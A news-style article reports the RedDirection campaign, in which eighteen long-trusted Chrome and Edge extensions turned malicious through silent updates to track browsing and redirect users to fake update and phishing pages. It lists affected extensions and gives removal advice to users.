A new and dangerous malware campaign has infected more than 2.3 million users across Google Chrome and Microsoft Edge through eighteen browser extensions. This campaign is called RedDirection and was discovered by cybersecurity researchers at Koi Security.
These extensions were not suspicious at all. They had Google’s verified badge, thousands of downloads, positive reviews, and were even featured on the official stores. But behind the scenes, they turned browsers into surveillance tools.
The campaign began with an extension called “Color Picker, Eyedropper — Geco colorpick”, which was fully functional and looked legitimate. It worked normally for years before a quiet version update turned it into malware.
After analyzing this extension’s command and control infrastructure, researchers found that it was just one part of a much larger operation. A total of 18 extensions—including emoji keyboards, video speed controllers, VPNs for Discord and TikTok, dark themes, and volume boosters—were carrying the same malicious code.
Each one had its own unique domain, giving the illusion of separate developers. But all of them were tied to one centralized attack infrastructure that worked across both Chrome and Edge browsers.
Every time a user opens a tab or visits a website, the extension captures the page URL and sends it to a remote server with a unique tracking ID. After getting a response, it redirects the user to a fake site. The malicious code hides in the extension’s background service worker, which quietly runs behind the scenes. The code is activated on every tabs.onUpdated event.
These redirects can lead users to fake Zoom pages asking to download a “critical update” or ask to download Malicious software to install more malware. Sometimes, these extensions also redirect users to phishing pages of bank websites.
One of the most dangerous aspects of this campaign is that the extensions were not malicious from day one. Many of them were clean and trusted for years. The malware was introduced through later version updates, which were silently installed without any warning. Because Google and Microsoft’s extension platforms auto-update extensions, most users had no idea their browsers had turned into a tracking and redirection tool.
Some of the known extensions involved in the RedDirection campaign include:
- Color Picker, Eyedropper — Geco colorpick
- Video Speed Controller
- Unlock Discord
- Dark Theme
- Volume Max
- Emoji Keyboard Online
- Free Weather Forecast
- Unlock YouTube VPN
- SearchGPT – ChatGPT for Search
- Youtube Unblocked
- Web Sound Equalizer
- Flash Player Emulator
Each one offered useful features and actually delivered them while also implementing hidden hijacking code.
For a full list of compromised extension IDs and domains used by the malware, see the Koi Security report.
If you have installed any of these extensions, remove them immediately and clear your browser history and site data. I also advise running a full malware scan and reviewing all your extensions carefully. Koi Security has also provided Indicators of Compromise (IOCs) to help detect the malware, including extension IDs and malicious server domains.
This campaign highlights a critical failure in how browser extension marketplaces operate. RedDirection is not just another attack. It is a supply chain-level failure, where trust signals meant to protect users were used against them. Over 2.3 million users have unknowingly been tracked, redirected, or exposed to attacks simply by installing what looked like trusted browser tools.
